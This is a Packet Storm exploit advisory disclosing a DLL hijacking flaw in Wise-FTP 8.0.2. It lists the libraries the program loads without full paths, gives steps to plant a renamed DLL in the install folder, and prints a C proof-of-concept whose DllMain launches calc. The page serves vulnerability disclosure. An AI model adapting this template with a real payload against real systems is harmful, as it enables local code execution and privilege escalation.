what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Wise-FTP 8.0.2 DLL Hijack

Wise-FTP 8.0.2 DLL Hijack
Posted May 19, 2015
Authored by metacom

Wise-FTP version 8.0.2 suffers from a dll hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | fe835e282b179efb7d2c3818cf4922476f474a73969909a944989d0332d281d9

Wise-FTP 8.0.2 DLL Hijack

Change Mirror Download
Technical Details & Description:
================================
A local dll injection vulnerability has been discovered in the official Wise-FTP v8.0.2 software.
The issue allows local attackers to inject code to vulnerable libraries to compromise the process or to gain higher access privileges.

The windows software is vulnerable to dll hijacking attacks. The vulnerability is located in the Linkinfo.dll , mpr.dll , netutils.dll , secur32.dll ,
wkscli.dll file extensions. The software does not specify the fully qualified path to a dynamic-linked libraries (Linkinfo.dll , mpr.dll , netutils.dll ,
secur32.dll , wkscli.dll). The vulnerable version affects the Wise-FTP v8.0.2 software. The security risk of the local file include vulnerability is estimated
as high with a cvss (common vulnerability scoring system) count of 6.0.

Vulnerable Software:
[+] Wise-FTP

Vulnerable Version(s):
[+] v8.02

Vulnerable Libraries:
[+] Linkinfo.dll
[+] mpr.dll
[+] netutils.dll
[+] secur32.dll
[+] wkscli.dll


Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to Linkinfo.dll or mpr.dll
2. Copy Linkinfo.dll to C:\Program Files\AceBIT\WISE-FTP 8
3. Launch WISE-FTP 8

PoC: DLL Hijack Exploit
/*
#include <windows.h>
int alpdaemon()
{
WinExec("calc", SW_SHOW);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
alpdaemon();
return 0;
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close